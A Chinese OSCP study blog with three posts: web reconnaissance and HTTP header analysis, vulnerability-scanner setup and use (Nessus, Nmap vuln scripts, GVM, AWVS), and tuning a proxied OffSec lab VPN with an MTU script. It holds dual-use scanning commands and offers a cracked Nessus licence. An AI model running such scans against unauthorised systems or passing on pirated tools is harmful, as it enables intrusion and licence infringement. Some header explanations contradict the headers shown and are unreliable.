工具 on 静静的安全笔记

Day23 Kali网络应用程序攻击

Sat, 26 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

对应OSCP官方教材第九章，这里只简要介绍top10的web漏洞，详细的漏洞用法有专门的专题讲解。

🔍 Web应用漏洞特性

特点	原因分析	应对策略
大攻击面	多依赖库+欠安全配置	依赖成分分析(SCA)工具辅助
技术栈无关性	OWASP Top 10漏洞普遍存在	掌握通用漏洞原理(SQLi/XSS/SSRF)
框架隐蔽性	路由机制隐藏文件扩展名	聚焦源码特征而非URL扩展

🚀 渗透测试四步方法论

graph TB
 A[信息收集] --> B[漏洞探测]
 B --> C[权限提升]
 C --> D[横向移动]
 
 subgraph A[信息收集]
 A1[技术栈识别] -->|语言/框架| A2[响应头分析]
 A1 -->|服务器/DB| A3[页面内容审查]
 A1 -->|敏感路径| A4[站点地图扫描]
 end

1. 信息收集核心技巧

途径	操作指令/位置	关键情报
URL解析	浏览器地址栏	`.jsp`(Java) `.aspx`(ASP.NET)
页面源码	Firefox `Ctrl+Shift+C` → 检查元素	jQuery版本/隐藏表单/注释信息
响应头	开发者工具 → 网络 → 点击请求	`Server: nginx/1.18.0`
站点地图	`curl https://target/robots.txt`	禁用爬取的敏感路径(如/admin)
管理后台	主动扫描 `/manager/html` `/wp-admin`	Tomcat/WordPress等默认入口

⚠️ 技术要点

1. 响应头情报价值

# 查看完整响应头
curl -I https://example.com

# 关键头解析示例
Server: Apache/2.4.29 (Ubuntu) # Web服务指纹
X-Powered-By: PHP/7.2.24 # 后端语言版本
X-AspNet-Version: 4.0.30319 # .NET框架版本

2. 源码分析三板斧

框架识别：
- React：查找 ReactDOM.render(
- Vue：搜索 new Vue({
敏感注释： 
客户端控制： <input type="hidden" name="isAdmin" value="false">

3. 后台路径字典

/console # WebLogic
/adminer.php # Adminer数据库管理
/kibana # ELK管理界面
:8080/manage # JBoss

实战案例

官方靶场网站：https://www.megacorpone.com

网站基本信息

可以使用Wappalyzer插件查看网站所用技术框架。

或使用whatweb工具查看

1whatweb https://www.megacorpone.com/

按F12或右键“检查”网页打开控制台查看网页信息

控制台中可以输入Js代码

点击最终便的按钮可以选择页面元素查看代码，文件上传后找上传的路径最好用。
检查网站常见文件是robots.txt和sitemap.xml。

一般是脚本在终端中爬取有配合其他命令自动化执行。

Burp抓包请求头和响应头分析

一、HTTP 请求头关键字段解析

 1GET / HTTP/1.1
 2Host: www.megacorpone.com
 3User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 5Accept-Language: en-US,en;q=0.5
 6Accept-Encoding: gzip, deflate, br
 7Dnt: 1
 8Upgrade-Insecure-Requests: 1
 9Sec-Fetch-Dest: document
10Sec-Fetch-Mode: navigate
11Sec-Fetch-Site: cross-site
12Priority: u=0, i
13Pragma: no-cache
14Cache-Control: no-cache
15Te: trailers
16Connection: keep-alive

请求方法
GET / HTTP/1.1
- 方法：GET（获取资源）
- 目标：根路径 /（通常为首页）
- 协议：HTTP/1.1（支持持久连接）
核心元数据
- Host: www.megacorpone.com
  请求的目标域名（用于虚拟主机路由）。
- User-Agent: Mozilla/5.0 (...) Firefox/133.0
  客户端浏览器和操作系统信息（可推断为 Win10 x64 的 Firefox 133）。
内容协商
- Accept: text/html, ...
  客户端支持的格式优先级：HTML > XHTML/XML > 其他类型。
- Accept-Language: zh-CN, zh;q=0.8 ...
  语言优先级：简体中文 > 广义中文 > 台湾繁体 > 香港繁体 > 英语。
- Accept-Encoding: gzip, deflate, br, zstd
  支持的压缩格式（服务器可选其一压缩响应）。
连接管理
- Connection: keep-alive
  要求复用 TCP 连接（减少重复握手开销）。
安全策略
- Upgrade-Insecure-Requests: 1
  建议升级到 HTTPS。
- Sec-Fetch-* 系列：
  - Dest: document – 目标为文档（如 HTML）。
  - Mode: navigate – 导航类请求（如页面跳转）。
  - Site: cross-site – 跨站请求（触发 CORS 校验）。

二、HTTP 响应头关键字段解析

 1HTTP/1.1 200 OK
 2Date: Mon, 28 Jul 2025 07:37:17 GMT
 3Server: Apache/2.4.62 (Debian)
 4Last-Modified: Wed, 06 Nov 2019 15:04:14 GMT
 5ETag: "390b-596aedca79780-gzip"
 6Accept-Ranges: bytes
 7Vary: Accept-Encoding
 8Content-Length: 14603
 9Keep-Alive: timeout=5, max=100
10Connection: Keep-Alive
11Content-Type: text/html

状态行
HTTP/1.1 200 OK
- 协议：HTTP/1.1
- 状态码：200（请求成功）
- 描述：OK（资源已返回）
服务器信息
- Server: Apache/2.4.62 (Debian)
  Web 服务器为 Apache 2.4.62，运行于 Debian 系统。
- Last-Modified: Wed, 06 Nov 2019 ...
  资源最后修改时间（用于客户端缓存验证）。
资源标识
- ETag: "390b-596aedca79780-gzip"
  资源唯一标识符（含 gzip 压缩标记）。
- Accept-Ranges: bytes
  支持按字节范围请求（用于断点续传）。
内容传输
- `Content-Length: 14603 压缩后资源大小为 14603 字节。
- Content-Type: text/html
  资源类型为 HTML 文档。
缓存优化
- Vary: Accept-Encoding
  缓存策略依据 Accept-Encoding 变化（不同压缩版本独立缓存）。
连接控制
- Connection: Keep-Alive
  保持 TCP 连接活跃。
- Keep-Alive: timeout=5, max=100
  连接空闲超时 5 秒，最多复用 100 次请求。

三、渗透测试中的关键关注点

服务器指纹
- Server 字段直接泄露 Web 服务器类型（Apache）、版本（2.4.62）、系统（Debian）。
- 风险：暴露已知漏洞的攻击面（如特定版本漏洞）。
隐藏技术栈标记
- 非标准响应头（如 X-Powered-By: PHP/8.1）可能泄露后端语言或框架。
- 操作建议：检查是否存在 X-Aspnet-Version 等字段，或通过 php.ini 设置 expose_php=off 隐藏 PHP 信息。
缓存机制利用
- ETag 和 Last-Modified 可用于构造条件请求，探测资源是否更新。
- 若返回 304 Not Modified，可能节省攻击流量。
压缩与编码
- Content-Encoding: gzip 需先解压再分析响应内容。
- 工具如 Burp Suite 自动处理压缩数据。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day22 Kali漏洞扫描

Fri, 25 Jul 2025 23:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

对应OSCP官方教材第八章。

漏洞扫描：安全评估的自动化基石

漏洞扫描（简称“漏扫”），作为网络安全领域不可或缺的核心技术手段，贯穿于安全评估的始终。其本质是通过集成海量漏洞验证脚本（POC）与利用脚本（EXP），向目标系统发送特定探测请求，并根据返回响应特征自动化识别潜在安全弱点的过程。

核心价值与定位：

效率引擎： 面对海量资产（如数十甚至上百个站点、服务器），手工检测效率低下且难以覆盖。漏扫工具凭借其自动化、批量化的特性，成为快速发现大面积、已知漏洞的首选武器，是安全审计流程中至关重要的第一步。
风险探照灯： 在复杂的网络环境中，“你永远不知道漏洞扫描会发生什么”。它是主动暴露未知风险、预防潜在攻击的有效途径。
技术与场景融合： 技术本身无高下之分，“黑猫白猫，抓到老鼠就是好猫”。自动化漏扫与精细化手工测试并非对立，而是互补。最佳实践是：先利用漏扫进行广覆盖、批量化的初步筛查，再对高风险目标或复杂逻辑进行深度手工验证，形成“广撒网+深挖潜”的高效组合拳。

工作原理与流程： 一个典型的漏洞扫描流程包含以下关键步骤：

主机发现： 识别网络中存活的目标设备。
端口扫描： 探测目标设备开放的网络端口。
指纹识别： 基于服务响应（如Banner、协议行为、文件特征）判断操作系统、应用、服务及其版本（需注意版本伪装现象，如某些Tomcat版本统一返回相同头部）。
服务与行为分析： 深入探测服务细节、暴露的文件、目录等。
漏洞特征匹配/利用验证： 运用庞大的POC/EXP库进行探测。部分高级扫描会进行试探性攻击以降低误报（但需谨慎评估风险）。

漏洞扫描核心总结

1. 手动扫描与自动扫描的辩证关系

维度	手动扫描	自动扫描
优势	精准发现逻辑漏洞；绕过防护机制；隐蔽性高（适合红队）；对目标干扰小	快速覆盖大规模目标；建立安全基准；标准化漏洞验证（如CVE匹配）
劣势	效率极低（难以处理大型目标）；高度依赖经验；易遗漏重复性漏洞	高误报/漏报率；难以发现复杂业务逻辑漏洞；攻击特征明显易触发告警
适用场景	关键系统深度测试、红队隐蔽渗透、漏洞二次验证	初筛阶段、合规性检查、周期性安全巡检

结论: 二者非对立关系，应遵循 “先自动化广覆盖，后手工精准打击” 的策略。渗透测试的核心价值在于 超越工具的人工分析能力。

2. 互联网扫描 vs. 内网扫描的关键差异

影响因素	互联网扫描	内网扫描
网络条件	带宽受限、高延迟、跳数多；防火墙/IPS严格过滤	高带宽、低延迟；内网设备可能老旧易崩溃
可见性	仅暴露面服务（ICMP/ARP常被阻断）	全端口可见（可ARP发现主机）
扫描策略	低速扫描（防触发警报）；优先非破坏性POC	可高速扫描；支持侵入式检测（需评估设备耐受性）

操作要点:

速度控制：初始使用低速率扫描，验证结果质量后逐步提速。
发现机制：互联网目标需使用TCP SYN等替代ICMP/ARP。
风险评估：内网扫描警惕对老旧设备的DoS风险。

3. 认证扫描 vs. 非认证扫描的深度对比

层面	认证扫描	非认证扫描
原理	凭据登录系统（SSH/WMI），访问内部资源	纯网络发包探测，无系统权限
检测深度	补丁状态、注册表、配置文件、敏感文件（如Program Files）	仅开放服务漏洞、Banner版本、弱口令等表层风险
准确性	误报率极低（直接验证漏洞存在性）	误报率高（依赖版本特征猜测）
配置挑战	Linux需SSH；Windows需破解UAC/WMI防火墙限制	开箱即用，无配置依赖

适用场景:

认证扫描：合规审计（如PCI DSS）、系统上线前深度检查。
非认证扫描：外部攻击面评估、应急响应快速筛查。

注意: Windows环境需解决UAC限制，否则认证扫描可能失败。

本章导读： 本章将深入剖析漏洞扫描的技术原理、核心工作流程、主流工具（如Nessus, AWVS, Nmap, GVM等）的应用模式（重点探讨认证与非认证扫描的实施细节与场景选择），分析其优势与局限性（精度问题、版本识别挑战），并探讨如何有效评估扫描结果、管理误报/漏报，以及如何将自动化扫描与手工测试有机结合，构建高效、全面的安全评估体系。理解漏洞扫描的本质和最佳实践，是每一位安全从业者夯实基础、提升效率的关键一步。

🛠️ Nessus安装和使用

官网下载链接：https://www.tenable.com/downloads/nessus?loginAttempted=true

# 1. 更新系统
sudo apt update && sudo apt upgrade -y

# 2. 下载Nessus .deb包（官网获取最新URL）
wget https://www.tenable.com/downloads/api/v2/pages/nessus/files/<最新版本>.deb

# 3. 校验文件完整性（需与官网SHA256匹配）
sha256sum Nessus-*.deb

# 4. 安装
sudo dpkg -i Nessus-*.deb

# 5. 启动服务
sudo systemctl start nessusd

# 6. 访问控制台
https://localhost:8834

后续配置：

选择 Nessus Essentials → 填写邮箱获取激活码 → 创建本地管理员账户
首次初始化需1小时+（自动下载13万+插件库）

扫描核心操作流程

1. 新建扫描

扫描类型	适用场景	关键配置
基本网络扫描	常规漏洞探测	默认设置（仅扫公共端口）
认证补丁审核	内网深度检测	需填SSH/Windows凭据
高级扫描	自定义漏洞检测	可禁用插件/指定端口

2. 目标配置

格式：IP/IP段/域名（例：10.11.1.73）

端口控制：

路径：设置 → 发现 → 端口扫描
修改 "Port Scan Range"：0-65535（全端口）或指定端口（如111）

3. 认证扫描配置

路径：凭据 → SSH
→ 认证方法：Password
→ 用户名：root
→ 密码：[目标密码]

4. 单插件扫描

路径：插件 → 点击"全部禁用"
→ 展开分类（如RPC）→ 启用特定插件（如"NFS Exported Share Information Disclosure"）

5. 结果分析

过滤高危漏洞：点击"过滤器" → 可被利用 = true
关闭分组视图：右上角齿轮 → 禁用分组
导出报告：支持PDF/CSV/HTML格式

操作避坑指南

资源警告：全端口扫描需8GB+内存，避免扫描期间运行其他重负载任务
账户锁定：在配置中关闭 “Brute Force” 选项（路径：扫描策略 → 高级）
Windows认证失败：确认目标开启WMI服务且防火墙放行135/445端口
插件更新：定期执行 sudo /opt/nessus/sbin/nessuscli update
破解：默认只能扫16个IP，破解请关注公众号回复本文开头的关键字获取。

🔍 Nmap漏洞扫描深度解析

核心机制： Nmap通过NSE脚本引擎（Nmap Scripting Engine）实现漏洞扫描，700+个Lua脚本分为两类：

vuln类：漏洞检测（如http-vuln-cve2017-5638）
exploit类：精简漏洞利用（如smb-vuln-cve-2017-7494）

⚠️ 安全风险分级（执行前必看）：

级别	特征	典型脚本
`safe`	仅信息收集	`http-title.nse`
`intrusive`	可能崩溃服务	`http-slowloris.nse`

🖥️ 关键操作命令：

# 查看所有漏洞扫描脚本
ls /usr/share/nmap/scripts | grep vuln

# 检查脚本功能（强烈建议使用AI解析）
nmap --script-help <脚本名> # 例如：nmap --script-help http-vuln*

# 安全扫描（仅用safe类）
nmap -sV --script "safe and vuln" <目标IP>

# 漏洞探测（vuln类脚本）
nmap -sV --script=vuln <目标IP>

# 精确调用指定脚本
nmap -sV --script=http-vuln-cve2021-41773 <目标IP>

# 扫描结果保存
nmap -sV -oX report.xml --script=vuln <目标IP>

⚙️ 脚本管理技巧：

# 查看脚本分类（script.db数据库）
grep 'categories' /usr/share/nmap/scripts/script.db

# 过滤高风险脚本（排除intrusive）
nmap --script "vuln and not intrusive" <目标IP>

# 更新NSE脚本库
sudo nmap --script-updatedb

📌 最佳实践：

未知脚本必查：nmap --script-help <脚本名> 或丢给AI解读

生产环境先用 --script-trace 预览探测行为

高危操作前在测试环境验证

🛡️ GVM（Greenbone漏洞管理器）部署指南

原为OpenVAS，是Nessus的开源分支，提供企业级漏洞管理能力。

⚡ 快速部署命令（Kali Linux）：

# 安装组件
sudo apt update && sudo apt install -y gvm*

# 初始配置（约15分钟，需联网）
sudo gvm-setup # 自动生成管理员账户

# 更新漏洞数据库（首次需20GB磁盘空间）
sudo gvm-feed-update

# 启动服务
sudo gvm-start # Web控制台：https://127.0.0.1:9392

# 验证安装
sudo gvm-check-setup # 显示各组件状态

🖥️ 常用操作：

# 启动/停止服务
sudo gvm-start | sudo gvm-stop

# 重置管理员密码
sudo runuser -u _gvm -- gvmd --user=admin --new-password=<新密码>

# 手动更新数据库（每日执行）
sudo crontab -e # 添加：0 0 * * * sudo gvm-feed-update

🌐 基础使用流程：

访问 https://localhost:9392 → 用 admin 和安装时生成的密码登录
创建扫描任务：
- 目标配置：指定IP/域名范围
- 扫描策略：选择 Full and fast（平衡模式）
- 认证设置：添加SSH/Windows凭证提升扫描深度
导出报告：支持PDF/CSV/XML格式

💡 高级技巧：

联动Nmap：将 nmap -oX 生成的XML报告导入GVM分析

定制策略：禁用暴力破解选项防账户锁定

计划任务：设置每周全盘扫描 + 每日增量扫描

🔍 AWVS 安装使用

Acunetix Web Vulnerability Scanner (AWVS) 是全球顶尖的 Web 应用漏洞扫描器，专注于自动化检测网站与 API 的安全漏洞。

🔑 核心特性：

类别	能力
扫描范围	SQL 注入、XSS、SSRF、JWT 漏洞、敏感信息泄露等 13000+ 漏洞
技术深度	支持现代 Web 技术（SPA、WebSocket、GraphQL 等）
部署模式	支持本地安装（Windows/Linux）和云平台（Acunetix Online）
合规性	满足 PCI DSS、HIPAA、ISO 27001 等安全标准

📌 定位：与传统网络扫描器（Nessus）互补，专精 Web 层漏洞挖掘。

📥 安装指南（Kali Linux）

⚠️ 前提条件：

硬件：≥4 核 CPU / 8GB RAM / 20GB 磁盘空间
系统：Kali Linux 2023+（或 Ubuntu/Debian）
授权：需官网获取 14 天试用密钥（或购买商业许可）

🛠️ 安装步骤：

# 1. 下载安装包（需注册官网获取下载链接）
wget https://dl.acunetix.com/acu/24.3/acuinstall.sh

# 2. 赋予执行权限
chmod +x acuinstall.sh

# 3. 安装依赖
sudo apt install -y libxcb-xinerama0 libxkbcommon-x11-0

# 4. 启动安装（默认端口：13443）
sudo ./acuinstall.sh --install-license YOUR_LICENSE_KEY

# 5. 访问控制台
https://localhost:13443

💡 重要提示：首次登录需设置管理员邮箱与密码（保存至 /var/lib/acunetix/.config）

🚀 基础使用教程

1. 创建扫描任务

目标配置
- 输入 URL（如 https://example.com）
- 启用 深度爬虫（识别 SPA 动态内容）
- 设置 认证登录（支持 Cookie/表单/OAuth）

扫描策略

模式	特点
快速扫描	耗时短，仅查高危漏洞
全扫描	覆盖所有漏洞检测模块（推荐）
自定义扫描	手动选择检测项（如仅查 API）

2. 扫描结果分析

漏洞分级： 🔴 高危（SQLi、RCE）→ 🟠 中危（XSS）→ 🟢 低危（信息泄露）
利用验证：支持 POC 重放（验证漏洞真实性）
报告导出：支持 PDF/HTML/XML（含修复建议）

3. 高级功能

API 扫描：导入 Swagger/Postman 文件
敏感数据监控：实时检测 Git 泄露、密钥硬编码
CI/CD 集成：Jenkins/GitLab 插件自动化扫描

⚠️ 避坑指南

问题	解决方案
扫描崩溃	限制并发请求（`Settings → Scan Settings → Max Requests`）
误报率高	启用 `Proof-Based Scanning` 二次验证
登录失效	使用 `AcuSensor` 代理抓取认证流量
社区版限制	避开「Acunetix 360 Free」，仅支持 3 页面扫描

相似功能新产品推荐

Nessus和AWVS作为入门熟悉的工具可用，但是再实际测试过程中误报和漏扫率高。安全技术更新换代快，以下是我个人对这些产品的经验看法，和推荐目前比较好用的几个工具。

⚖️ 商业 vs 开源核心差异分析

首先，这些产品分为商业版和开源版，两者的区别有：

🏭 商业工具依赖维度

graph TB
A[商业产品] --> B(专属漏洞实验室)
A --> C(0day快速响应)
A --> D(自动化合规报告)
A --> E(私有漏洞情报)
F[公司经营风险] --> G[产品更新放缓]
F --> H[漏洞库滞后]
F --> I[误报率上升]

🌐 开源工具生存逻辑

graph TB
J[开源项目] --> K(社区贡献者)
J --> L(GitHub Star驱动)
J --> M(企业赞助)
N[技术门槛] --> O[需自行维护规则库]
N --> P[适配定制化环境]
N --> Q[漏洞验证脚本开发]

📊 关键能力对比

能力维度	商业工具	开源工具
漏洞响应速度	0day通常<24小时	依赖社区更新（平均3-7天）
合规支持	自动生成符合审计的报告	需手动整理
使用成本	年费5000−50000+	免费但需时间成本
定制灵活性	闭源不可修改	可二次开发

🛡️ 中国网络安全市场主流产品图谱

产品名称	厂商	主打能力	行业占有率
奇安信网神漏洞扫描系统	奇安信	等保2.0合规驱动 · 信创生态适配（麒麟/统信） · 0day响应<12小时	政府/央企（≥35%）
安恒明鉴漏洞扫描器	安恒信息	Web3.0深度检测 · API安全治理 · 结合「北斗」AI引擎	金融/医疗（28%）
绿盟极光漏洞扫描系统	绿盟科技	攻防演练模式 · ICS/OT工控支持 · 漏洞利用链可视化	能源/制造业（20%）
长亭洞鉴	长亭	动态流量分析 · RASP结合 · 云原生漏洞挖掘	互联网/云平台（18%）
启明星辰天镜	启明星辰	资产管理优先 · 漏洞生命周期管理 · 等保测评报告自动生成	教育/运营商（15%）

🆚 国产 VS 国际产品关键差异

维度	国内产品优势	国际产品劣势
合规支持	内置等保2.0/关基条例模板	需定制开发
漏洞响应	CNNVD/CNVD同步<6小时	CVE中心依赖（时差延迟）
信创适配	深度支持国产OS/数据库	仅兼容Windows/Linux主流版
定价策略	按IP/年收费（含驻场服务）	订阅制（美元结算+高溢价）

🚀 免费替代方案推荐

XRay 社区版（长亭开源）

# 被动代理扫描
./xray webscan --listen 127.0.0.1:7777

Goby 社区版
- 资产测绘免费 · 漏洞扫描限量
Yakit+Nuclei
- Yakit是集成化单兵安全能力平台，用Yaklang语言编写
- Nuclei有丰富的开源模板，也可以自行编写漏洞模板，或让AI编写
- Yakit支持直接导入Nuclei模板扫描

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

【踩坑总结】丝滑连接OffSec官方VPN的方法

Wed, 16 Jul 2025 16:45:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具。

方法对比	难度	流畅度	靶机VPN是否双端	流量消耗	稳定性
方法一：Tun模式	⭐⭐	340ms	仅Kali	大	好
方法二：允许局域网	⭐⭐⭐	190ms	Win、Kali双端	小	差
方法三：Kali中单独登机	⭐⭐⭐	200ms	仅Kali	中	好

流畅度测试命令 ping IP -c 10 |grep rtt

方法一：物理机登机场开Tun模式，Kali虚拟机连接靶机VPN

找个机场订阅，需要登机方式的可以后台私信我。

点击左边的“代理”，点击“全局”，设置为全局模式，点击Traffic自动选择最快的节点，考试时候建议手动选择下面有地名的节点，一开始选的哪一个，只选那个，不要换节点，可能会因为节点异地登录引起麻烦。

点击左侧“设置”按钮，打开Tun模式和服务模式，红框里面的建议都打开，其他按钮不要动。服务模式的小盾牌点一下，安装一个组件，没有装的装一下。

除了Clash小猫咪软件，也可以使用V2rayN软件特定版本的tun模式，不要使用新版，新版的tun不稳定。

此时进入Kali虚拟机，查询一下自己的出口节点，确实是机场的节点了，而且ping谷歌的速度也比较快，就说明翻过去了。

下载Kali官方的VPN，复制到Kali虚拟机中。

然后在Kali中使用以下命令连接Kali靶机的VPN。

1sudo openvpn universal.ovpn

然后用ifconfig 命令能发现多出来的网卡。

使用如下命令设置以下速率，来保证VPN的传输稳定，如果你的机场够快，下面的命令也可以不设，默认的1500速度也一样的。

1sudo ip link set dev tun0 mtu 1250
2ip link show tun0

靶场漏端口的情况和机场连接的速度有关，测试下来的经验：

极速机场：便宜，拖Docker镜像确实极速，但是干别的不行，Kali的VPN都连不上。
龙猫机场：价格中等，拖Docker镜像有点慢，综合来说干什么都可以，就是都有点慢，能连Kali的VPN，但是扫端口略慢。
Flower机场：价格是龙猫的两倍，速度很快，连Kali的VPN很丝滑，推荐考试使用。
一元机场：白菜价，巨慢，疑似跑路了，节点没几个活的了。
自建专线机场：包机，很快，但是也贵，速度看机场在哪里，建议买香港节点，连Kali的VPN很丝滑，推荐考试使用。

总结：这个方法最简单也最直接，但是tun+全局模式会让所有流量都走的机场代理，对于机场流量消耗巨大。还有就是某些国内网站从国外地址翻进来访问也是很慢很慢。

方法二：物理机登机场允许局域网连接，修改universal.ovpn开头

代理规则组依旧是选择全局代理。

系统设置上关闭Tun模式，关闭服务模式，打开“局域网连接”

注意看端口用的时哪一个，这里用的时7897。修改官网下载的VPN文件，在首行加入代理地址

1socks-proxy 127.0.0.1 7897

然后再物理机Windows中直接导入OpenVPN GUI软件中，再Windows上连接VPN。

VPN软件中设置代理为“使用配置文件中的设置”

选中VPN名称后右键打开选项，点击连接即可。第一次连接后有概率会重连或断开一次，再次点击重新连接即可。

WIndows下打开也可以看靶机，Kali下也可以。

Windows和Kali上的速率相差不大。

但是使用Nmap有概率扫漏端口。

直接请求的话，还是能请求的。但是连接不稳定，即使物理机到虚拟机的网络设置了不限速，但是再Kali中扫描靶机还是很慢。还有概率断线。

方法三：Kali中用V2rayN命令行连接，Kali直连Vpn

安装V2rayN的Linux版本，复制机场信息到Kali中，在Kali中登录VPN。

扫描端口也不掉包的。

命令参数之间的配合

如果mtu速度、机场速度和Nmap等命令参数配合的不对，可能出现以下情况

一扫就是一堆

端口漏扫

扫的很慢，半天没有反应。

每个人的网络环境不一样，带宽和速度不一样，使用Wifi和使用网线的稳定性和速率也不一样。所以同样的命令参数，别人能用但不代表你的网络环境能用。建议考试时，提前测试考试地点的网络环境或者使用之前练习时候的场景即可。尽量保证网络最优，不要因为漏扫某个关键端口而出现打不进去的情况。如果你怀疑你的网络有问题，建议使用官方网页的My Kali再次验证一下，以官方My Kali的扫描结果为准。

下面是一些网络优化的建议：

自动MTU测试脚本

将以下脚本保存为mtu-test.sh

 1#!/bin/bash
 2# 自动化MTU测试脚本 - 支持自定义参数
 3
 4# 默认参数配置
 5DEFAULT_TARGET="192.168.116.72"
 6QUICK_START=1472 # 快速测试起始值
 7QUICK_END=1200 # 快速测试结束值
 8QUICK_STEP=-10 # 快速测试步长
 9FULL_START=1472 # 完整测试起始值
 10FULL_END=500 # 完整测试结束值
 11FULL_STEP=-5 # 完整测试步长
 12TUNNEL_OVERHEAD=40 # 默认隧道包头开销(字节)
 13
 14# 帮助信息
 15show_help() {
 16 echo "用法: $0 [选项]"
 17 echo "选项:"
 18 echo " -t <IP地址> 指定测试目标 (默认: $DEFAULT_TARGET)"
 19 echo " -f 使用完整测试范围 (默认使用快速范围)"
 20 echo " -o <字节> 隧道包头开销 (默认: $TUNNEL_OVERHEAD)"
 21 echo " -s <起始值> 自定义测试起始值 (需要 -e 和 -p 配合)"
 22 echo " -e <结束值> 自定义测试结束值"
 23 echo " -p <步长> 自定义测试步长 (必须为负数)"
 24 echo " -h 显示帮助信息"
 25 exit 0
 26}
 27
 28# 参数解析
 29while getopts "t:fho:s:e:p:" opt; do
 30 case $opt in
 31 t) TARGET="$OPTARG" ;;
 32 f) USE_FULL_RANGE=true ;;
 33 o) TUNNEL_OVERHEAD="$OPTARG" ;;
 34 s) CUSTOM_START="$OPTARG" ;;
 35 e) CUSTOM_END="$OPTARG" ;;
 36 p) CUSTOM_STEP="$OPTARG" ;;
 37 h) show_help ;;
 38 *) echo "无效选项: -$OPTARG" >&2; exit 1 ;;
 39 esac
 40done
 41
 42# 设置目标
 43TARGET=${TARGET:-$DEFAULT_TARGET}
 44
 45# 设置测试范围
 46if [ -n "$CUSTOM_START" ] && [ -n "$CUSTOM_END" ] && [ -n "$CUSTOM_STEP" ]; then
 47 echo "使用自定义测试范围: $CUSTOM_START -> $CUSTOM_END (步长 $CUSTOM_STEP)"
 48 TEST_START=$CUSTOM_START
 49 TEST_END=$CUSTOM_END
 50 TEST_STEP=$CUSTOM_STEP
 51elif [ "$USE_FULL_RANGE" = true ]; then
 52 echo "使用完整测试范围: $FULL_START -> $FULL_END (步长 $FULL_STEP)"
 53 TEST_START=$FULL_START
 54 TEST_END=$FULL_END
 55 TEST_STEP=$FULL_STEP
 56else
 57 echo "使用快速测试范围: $QUICK_START -> $QUICK_END (步长 $QUICK_STEP)"
 58 TEST_START=$QUICK_START
 59 TEST_END=$QUICK_END
 60 TEST_STEP=$QUICK_STEP
 61fi
 62
 63# 验证自定义步长
 64if [ -n "$CUSTOM_STEP" ] && [ "$CUSTOM_STEP" -ge 0 ]; then
 65 echo "错误: 自定义步长必须是负数!" >&2
 66 exit 1
 67fi
 68
 69# 计算实际MTU值时需添加头部大小
 70HEADER_SIZE=28 # IP头(20字节) + ICMP头(8字节)
 71SUCCESS_SIZE=0
 72
 73# 设置临时MTU
 74TEMP_MTU=1250
 75sudo ip link set dev tun0 mtu $TEMP_MTU
 76echo "设置临时MTU为$TEMP_MTU用于测试"
 77
 78# MTU测试函数
 79test_mtu_range() {
 80 local size=$TEST_START
 81 while [ "$size" -ge $TEST_END ]; do
 82 local packet_size=$((size - HEADER_SIZE))
 83 if [ $packet_size -le 0 ]; then
 84 echo "无效测试大小: $size (结果值: $packet_size)"
 85 size=$((size + TEST_STEP))
 86 continue
 87 fi
 88 
 89 echo -n "测试包大小: $size字节 (MTU等效值: $((size + TUNNEL_OVERHEAD))字节)... "
 90 
 91 if ping -c 2 -M do -s $packet_size $TARGET >/dev/null 2>&1; then
 92 echo "成功!"
 93 SUCCESS_SIZE=$size
 94 break
 95 else
 96 echo "失败"
 97 fi
 98 
 99 # 避免无限循环
100 if [ $TEST_STEP -eq 0 ]; then
101 echo "警告: 步长为0可能导致无限循环!"
102 break
103 fi
104 
105 size=$((size + TEST_STEP))
106 done
107}
108
109# 执行测试
110echo "开始对$TARGET进行MTU测试..."
111test_mtu_range
112
113# 计算结果
114if [ "$SUCCESS_SIZE" -gt 0 ]; then
115 OPTIMAL_MTU=$((SUCCESS_SIZE + TUNNEL_OVERHEAD))
116 echo "------------------------------------------------------"
117 echo "测试成功! 最大无分片包大小: $SUCCESS_SIZE字节"
118 echo "隧道包头开销: $TUNNEL_OVERHEAD字节"
119 echo "推荐MTU值: $OPTIMAL_MTU"
120 echo "计算: 包大小($SUCCESS_SIZE) + 开销($TUNNEL_OVERHEAD)"
121 
122 # 设置最佳MTU
123 sudo ip link set dev tun0 mtu $OPTIMAL_MTU
124 echo "已将tun0 MTU设置为$OPTIMAL_MTU"
125else
126 echo "------------------------------------------------------"
127 echo "测试失败! 未找到有效MTU值"
128 echo "可能原因:"
129 echo "1. 目标$TARGET不可达"
130 echo "2. 测试范围不适用(尝试调整参数)"
131 echo "3. 网络环境特殊(防火墙阻止ICMP测试)"
132 
133 # 还原初始设置
134 sudo ip link set dev tun0 mtu 1500
135 echo "已还原tun0 MTU为1500"
136fi

保存后给脚本添加课执行权限，然后通过以下命令测试最佳MTU值。

 1# 指定目标+完整范围测试
 2./mtu-test.sh -t 192.168.116.72 -f
 3
 4# 自定义测试范围
 5./mtu-test.sh -s 1450 -e 1100 -p -2
 6
 7# 设置隧道开销（适用于不同VPN协议）
 8./mtu-test.sh -o 50 # OpenVPN等大包头协议
 9
10# 更大步长覆盖宽范围 针对卫星链路优化
11./mtu-test.sh -t 192.168.1.100 -s 1500 -e 400 -p -20 -o 60
12
13# 精细步长测试可疑区间
14./mtu-test.sh -t 10.8.0.1 -s 1420 -e 1390 -p -1 -o 50

隧道开销参考值

VPN协议	推荐开销值	包含内容
WireGuard	40-60	基本头+加密信息
OpenVPN	60-100	IP头+UDP头+OpenVPN封装头
